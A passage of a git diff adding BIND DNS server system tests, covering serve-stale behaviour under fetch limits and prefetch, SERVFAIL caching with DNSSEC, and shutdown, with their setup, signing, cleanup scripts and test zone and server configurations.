@10.53.0.3 nx.example > dig.out.test$n + grep "status: SERVFAIL" dig.out.test$n > /dev/null || return 1 +} + +n=$((n+1)) +echo_i "hit fetch limits ($n)" +ret=0 +retry_quiet 10 wait_for_fetchlimits || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Expect stale data now (because fetch-limits for the domain 'example.' (and +# everything below) has been reached. But we have a stale RRset for +# 'data.example/TXT' that can be used. +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT comes from cache (fetch-limits) ($n)" +nextpart ns3/named.run > /dev/null +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +wait_for_log 5 "data.example resolver failure, stale answer used" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# The previous query should not have started the stale-refresh-time window. +n=$((n+1)) +ret=0 +echo_i "check stale data.example TXT comes from cache again (fetch-limits) ($n)" +nextpart ns3/named.run > /dev/null +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +wait_for_log 5 "data.example resolver failure, stale answer used" ns3/named.run || ret=1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*3.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +######################################################################## +# Test serve-stale's interaction with fetch limits (dual-mode) # +######################################################################## +echo_i "test serve-stale's interaction with fetch limits (dual-mode)" + +# Update named configuration so that ns3 becomes a recursive resolver which is +# also a secondary server for the root zone. +n=$((n+1)) +echo_i "updating ns3/named.conf ($n)" +ret=0 +copy_setports ns3/named7.conf.in ns3/named.conf +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "running 'rndc reload' ($n)" +ret=0 +rndc_reload ns3 10.53.0.3 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Flush the cache to ensure the example/NS RRset cached during previous tests +# does not override the authoritative delegation found in the root zone. +n=$((n+1)) +echo_i "flush cache ($n)" +ret=0 +$RNDCCMD 10.53.0.3 flush > rndc.out.test$n 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Query name server with low fetch limits. The authoritative server (ans2) is +# not responding. Sending queries for multiple names in the 'example' zone +# in parallel causes the fetch limit for that zone (set to 1) to be +# reached. This should not trigger a crash. +echo_i "sending queries for tests $((n+1))-$((n+4))..." +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} @10.53.0.3 othertype.example CAA > dig.out.test$((n+2)) & +$DIG -p ${PORT} @10.53.0.3 nodata.example TXT > dig.out.test$((n+3)) & +$DIG -p ${PORT} @10.53.0.3 nxdomain.example TXT > dig.out.test$((n+4)) + +wait + +# Expect SERVFAIL for the entries not in cache. +n=$((n+1)) +echo_i "check stale data.example TXT (fetch-limits dual-mode) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale othertype.example CAA (fetch-limits dual-mode) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nodata.example TXT (fetch-limits dual-mode) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nxdomain.example TXT (fetch-limits dual-mode) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check DNS64 processing of a stale negative answer ($n)" +ret=0 +# configure ns3 with dns64 +copy_setports ns3/named8.conf.in ns3/named.conf +rndc_reload ns3 10.53.0.3 +# flush cache, enable ans2 responses, make sure serve-stale is on +$RNDCCMD 10.53.0.3 flush > rndc.out.test$n.1 2>&1 || ret=1 +$DIG -p ${PORT} @10.53.0.2 txt enable > /dev/null +$RNDCCMD 10.53.0.3 serve-stale on > rndc.out.test$n.2 2>&1 || ret=1 +# prime the cache with an AAAA NXRRSET response +$DIG -p ${PORT} @10.53.0.3 a-only.example AAAA > dig.out.1.test$n +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +grep "2001:aaaa" dig.out.1.test$n > /dev/null || ret=1 +# disable responses from the auth server +$DIG -p ${PORT} @10.53.0.2 txt disable > /dev/null +# wait two seconds for the previous answer to become stale +sleep 2 +# resend the query and wait in the background; we should get a stale answer +$DIG -p ${PORT} @10.53.0.3 a-only.example AAAA > dig.out.2.test$n & +# re-enable queries after a pause, so the server gets a real answer too +sleep 2 +$DIG -p ${PORT} @10.53.0.2 txt enable > /dev/null +wait +grep "status: NOERROR" dig.out.2.test$n > /dev/null || ret=1 +grep "2001:aaaa" dig.out.2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################### +# Test serve-stale's interaction with prefetch processing # +########################################################### +echo_i "test serve-stale's interaction with prefetch processing" + +# Test case for #2733, ensuring that prefetch queries do not trigger +# a lookup due to stale-answer-client-timeout. +# +# 1. Cache the following records: +# cname.example 7 IN CNAME target.example. +# target.example 9 IN A <addr>. +# 2. Let the CNAME RRset expire. +# 3. Query for 'cname.example/A'. +# +# This starts recursion because cname.example/CNAME is expired. +# The authoritative server is up so likely it will respond before +# stale-answer-client-timeout is triggered. +# The 'target.example/A' RRset is found in cache with a positive value +# and is eligble for prefetching. +# A prefetch is done for 'target.example/A', our ans2 server will +# delay the request. +# The 'prefetch_done()' callback should have the right event type +# (DNS_EVENT_FETCHDONE). + +# flush cache +n=$((n+1)) +echo_i "flush cache ($n)" +ret=0 +$RNDCCMD 10.53.0.3 flushtree example > rndc.out.test$n.1 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# prime the cache with CNAME and A; CNAME expires sooner +n=$((n+1)) +echo_i "prime cache cname.example A (stale-answer-client-timeout 1.8) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 cname.example A > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "cname\.example\..*7.*IN.*CNAME.*target\.example\." dig.out.test$n > /dev/null || ret=1 +grep "target\.example\..*9.*IN.*A" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# wait for the CNAME to be stale; A will still be valid and in prefetch window. +# (the longer TTL is needed, otherwise data won't be prefetch-eligible.) +sleep 7 + +# re-enable auth responses, but with a delay answering the A +n=$((n+1)) +echo_i "delay responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt slowdown > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# resend the query and wait in the background; we should get a stale answer +n=$((n+1)) +echo_i "check prefetch processing of a stale CNAME target ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 cname.example A > dig.out.test$n & +sleep 2 +wait +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.test$n > /dev/null || ret=1 +grep "cname\.example\..*7.*IN.*CNAME.*target\.example\." dig.out.test$n > /dev/null || ret=1 +grep "target\.example\..*[1-2].*IN.*A" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/setup.sh b/bin/tests/system/setup.sh new file mode 100644 index 0000000..1667acd --- /dev/null +++ b/bin/tests/system/setup.sh @@ -0,0 +1,34 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Run a system test. +# + +SYSTEMTESTTOP=. +. $SYSTEMTESTTOP/conf.sh + +test $# -gt 0 || { echo "usage: $0 test-directory" >&2; exit 1; } + +test=$1 +shift + +test -d $test || { echo "$0: $test: no such test" >&2; exit 1; } + +# Set up any dynamically generated test data +if test -f $test/setup.sh +then + ( cd $test && $SHELL setup.sh "$@" ) +fi + + diff --git a/bin/tests/system/sfcache/README b/bin/tests/system/sfcache/README new file mode 100644 index 0000000..91b2126 --- /dev/null +++ b/bin/tests/system/sfcache/README @@ -0,0 +1,19 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +The test setup for the SERVFAIL ncache tests has a secure root. + +ns1 is the root server. + +ns2 is an authoritative server for the various test domains. + +ns5 is a caching-only server, configured with the an incorrect trusted +key for the root. It is used for testing failure cases. diff --git a/bin/tests/system/sfcache/clean.sh b/bin/tests/system/sfcache/clean.sh new file mode 100644 index 0000000..e8bd818 --- /dev/null +++ b/bin/tests/system/sfcache/clean.sh @@ -0,0 +1,27 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +rm -f ./*/K*.key ./*/K*.private ./*/*.signed ./*/*.db ./*/dsset-* +rm -f ./*/managed.conf ./*/trusted.conf +rm -f ./*/named.memstats +rm -f ./*/named.conf +rm -f ./*/named.run ./*/named.run.prev +rm -f ./dig.* +rm -f ./rndc.* +rm -f ./sfcache.* +rm -f ./ns*/managed-keys.bind* +rm -f ./ns*/named.lock +rm -f ./ns5/named.run.part* +rm -f ./ns5/named_dump* diff --git a/bin/tests/system/sfcache/ns1/named.conf.in b/bin/tests/system/sfcache/ns1/named.conf.in new file mode 100644 index 0000000..4a9822d --- /dev/null +++ b/bin/tests/system/sfcache/ns1/named.conf.in @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/sfcache/ns1/root.db.in b/bin/tests/system/sfcache/ns1/root.db.in new file mode 100644 index 0000000..1deb998 --- /dev/null +++ b/bin/tests/system/sfcache/ns1/root.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 +example2. NS ns2.example2. +ns2.example2. A 10.53.0.2 diff --git a/bin/tests/system/sfcache/ns1/sign.sh b/bin/tests/system/sfcache/ns1/sign.sh new file mode 100644 index 0000000..d97b63d --- /dev/null +++ b/bin/tests/system/sfcache/ns1/sign.sh @@ -0,0 +1,38 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +zone=. +infile=root.db.in +zonefile=root.db + +(cd ../ns2 && $SHELL sign.sh ) + +cp "../ns2/dsset-example$TP" . + +keyname=$($KEYGEN -q -a "${DEFAULT_ALGORITHM}" -b "${DEFAULT_BITS}" -n zone $zone) + +cat "$infile" "$keyname.key" > "$zonefile" + +$SIGNER -P -g -o $zone $zonefile > /dev/null + +# Configure the resolving server with a static key. +keyfile_to_static_ds "$keyname" > trusted.conf +cp trusted.conf ../ns2/trusted.conf + +# ...or with an initializing key. +keyfile_to_initial_ds "$keyname" > managed.conf diff --git a/bin/tests/system/sfcache/ns2/example.db.in b/bin/tests/system/sfcache/ns2/example.db.in new file mode 100644 index 0000000..c035ee8 --- /dev/null +++ b/bin/tests/system/sfcache/ns2/example.db.in @@ -0,0 +1,103 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 + +; Used for testing ANY queries +foo TXT "testing" +foo A 10.0.1.0 + +bad-cname CNAME a +bad-dname DNAME @ + +; Used for testing CNAME queries +cname1 CNAME cname1-target +cname1-target TXT "testing cname" + +cname2 CNAME cname2-target +cname2-target TXT "testing cname" + +; Used for testing DNAME queries +dname1 DNAME dname1-target +foo.dname1-target TXT "testing dname" + +dname2 DNAME dname2-target +foo.dname2-target TXT "testing dname" + +; A secure subdomain +secure NS ns.secure +ns.secure A 10.53.0.3 + +; An insecure subdomain +insecure NS ns.insecure +ns.insecure A 10.53.0.3 + +; A secure subdomain we're going to inject bogus data into +bogus NS ns.bogus +ns.bogus A 10.53.0.3 + +; A dynamic secure subdomain +dynamic NS dynamic +dynamic A 10.53.0.3 + +; A insecure subdomain +mustbesecure NS ns.mustbesecure +ns.mustbesecure A 10.53.0.3 + +; A rfc2535 signed zone w/ CNAME +rfc2535 NS ns.rfc2535 +ns.rfc2535 A 10.53.0.3 + +z A 10.0.0.26 + +keyless NS ns.keyless +ns.keyless A 10.53.0.3 + +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 + +optout NS ns.optout +ns.optout A 10.53.0.3 + +nsec3-unknown NS ns.nsec3-unknown +ns.nsec3-unknown A 10.53.0.3 + +optout-unknown NS ns.optout-unknown +ns.optout-unknown A 10.53.0.3 + +multiple NS ns.multiple +ns.multiple A 10.53.0.3 + +*.wild A 10.0.0.27 + +rsasha256 NS ns.rsasha256 +ns.rsasha256 A 10.53.0.3 + +rsasha512 NS ns.rsasha512 +ns.rsasha512 A 10.53.0.3 + +kskonly NS ns.kskonly +ns.kskonly A 10.53.0.3 diff --git a/bin/tests/system/sfcache/ns2/named.conf.in b/bin/tests/system/sfcache/ns2/named.conf.in new file mode 100644 index 0000000..2ec6675 --- /dev/null +++ b/bin/tests/system/sfcache/ns2/named.conf.in @@ -0,0 +1,49 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db.signed"; + allow-update { any; }; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/sfcache/ns2/sign.sh b/bin/tests/system/sfcache/ns2/sign.sh new file mode 100644 index 0000000..bbdf086 --- /dev/null +++ b/bin/tests/system/sfcache/ns2/sign.sh @@ -0,0 +1,28 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +zone=example. +infile=example.db.in +zonefile=example.db + +keyname1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +keyname2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile" + +"$SIGNER" -P -g -o "$zone" -k "$keyname1" "$zonefile" "$keyname2" > /dev/null diff --git a/bin/tests/system/sfcache/ns5/named.conf.in b/bin/tests/system/sfcache/ns5/named.conf.in new file mode 100644 index 0000000..df3938b --- /dev/null +++ b/bin/tests/system/sfcache/ns5/named.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + servfail-ttl 30; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/sfcache/ns5/sign.sh b/bin/tests/system/sfcache/ns5/sign.sh new file mode 100644 index 0000000..40d7095 --- /dev/null +++ b/bin/tests/system/sfcache/ns5/sign.sh @@ -0,0 +1,21 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +keyname=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone ".") + +keyfile_to_static_ds "$keyname" > trusted.conf diff --git a/bin/tests/system/sfcache/setup.sh b/bin/tests/system/sfcache/setup.sh new file mode 100644 index 0000000..3e09fe9 --- /dev/null +++ b/bin/tests/system/sfcache/setup.sh @@ -0,0 +1,24 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns5/named.conf.in ns5/named.conf + +cd ns1 && $SHELL sign.sh && cd .. +cd ns5 && $SHELL sign.sh && cd .. diff --git a/bin/tests/system/sfcache/tests.sh b/bin/tests/system/sfcache/tests.sh new file mode 100644 index 0000000..4c47e08 --- /dev/null +++ b/bin/tests/system/sfcache/tests.sh @@ -0,0 +1,108 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +status=0 +n=0 + +rm -f dig.out.* + +dig_with_opts() { + "$DIG" +tcp +noadd +nosea +nostat +nocmd -p "$PORT" "$@" +} + +rndc_with_opts() { + "$RNDC" -c "$SYSTEMTESTTOP/common/rndc.conf" -p "$CONTROLPORT" -s "$@" +} + +echo_i "checking DNSSEC SERVFAIL is cached ($n)" +ret=0 +dig_with_opts +dnssec foo.example. a @10.53.0.5 > dig.out.ns5.test$n || ret=1 +rndc_dumpdb ns5 -all +awk '/Zone/{out=0} { if (out) print } /SERVFAIL/{out=1}' ns5/named_dump.db.test$n > sfcache.$n +grep "^; foo.example/A" sfcache.$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking SERVFAIL is returned from cache ($n)" +ret=0 +dig_with_opts +dnssec foo.example. a @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep "SERVFAIL" dig.out.ns5.test$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking that +cd bypasses cache check ($n)" +ret=0 +dig_with_opts +dnssec +cd foo.example. a @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep "SERVFAIL" dig.out.ns5.test$n > /dev/null && ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "switching to non-dnssec SERVFAIL tests" +ret=0 +rndc_with_opts 10.53.0.5 flush 2>&1 | sed 's/^/I:ns5 /' +rndc_dumpdb ns5 -all +mv ns5/named_dump.db.test$n ns5/named_dump.db.test$n.1 +awk '/SERVFAIL/ { next; out=1 } /Zone/ { out=0 } { if (out) print }' ns5/named_dump.db.test$n.1 > sfcache.$n.1 +[ -s "sfcache.$n.1" ] && ret=1 +echo_i "checking SERVFAIL is cached ($n)" +dig_with_opts bar.example2. a @10.53.0.5 > dig.out.ns5.test$n || ret=1 +rndc_dumpdb ns5 -all +mv ns5/named_dump.db.test$n ns5/named_dump.db.test$n.2 +awk '/Zone/{out=0} { if (out) print } /SERVFAIL/{out=1}' ns5/named_dump.db.test$n.2 > sfcache.$n.2 +grep "^; bar.example2/A" sfcache.$n.2 > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking SERVFAIL is returned from cache ($n)" +ret=0 +nextpart ns5/named.run > /dev/null +dig_with_opts bar.example2. a @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep "SERVFAIL" dig.out.ns5.test$n > /dev/null || ret=1 +nextpart ns5/named.run > ns5/named.run.part$n +grep 'servfail cache hit bar.example2/A (CD=0)' ns5/named.run.part$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking cache is bypassed with +cd query ($n)" +ret=0 +dig_with_opts +cd bar.example2. a @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep "SERVFAIL" dig.out.ns5.test$n > /dev/null || ret=1 +nextpart ns5/named.run > ns5/named.run.part$n +grep 'servfail cache hit' ns5/named.run.part$n > /dev/null && ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking cache is used for subsequent +cd query ($n)" +ret=0 +dig_with_opts +dnssec bar.example2. a @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep "SERVFAIL" dig.out.ns5.test$n > /dev/null || ret=1 +nextpart ns5/named.run > ns5/named.run.part$n +grep 'servfail cache hit bar.example2/A (CD=1)' ns5/named.run.part$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/shutdown/clean.sh b/bin/tests/system/shutdown/clean.sh new file mode 100644 index 0000000..d958521 --- /dev/null +++ b/bin/tests/system/shutdown/clean.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns*/*.jnl +rm -f ns*/named.lock +rm -f ns*/named.memstats +rm -f ns*/rpz*.txt +rm -f */named.conf +rm -f */named.run +rm -rf __pycache__ diff --git a/bin/tests/system/shutdown/ns1/named.conf.in b/bin/tests/system/shutdown/ns1/named.conf.in new file mode 100644 index 0000000..dc20259 --- /dev/null +++ b/bin/tests/system/shutdown/ns1/named.conf.in @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + listen-on { 10.53.0.1; }; + pid-file "named.pid"; + notify no; + dnssec-validation no; + allow-query { any; }; + recursion yes; + allow-recursion { any; }; +}; + +# Delegate .test domain to 10.53.0.2 +zone "." { + type master; + file "root.db"; + allow-transfer { none; }; +}; diff --git a/bin/tests/system/shutdown/ns1/root.db b/bin/tests/system/shutdown/ns1/root.db new file mode 100644 index 0000000..60f1b30 --- /dev/null +++ b/bin/tests/system/shutdown/ns1/root.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA a.root. root.test. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) + +. IN NS a.root. +a.root. IN A 10.53.0.1 + +test IN NS ns1.test +ns1.test IN A 10.53.0.2 diff --git a/bin/tests/system/shutdown/ns2/named.conf.in b/bin/tests/system/shutdown/ns2/named.conf.in new file mode 100644 index 0000000..4679c1e --- /dev/null +++ b/bin/tests/system/shutdown/ns2/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + 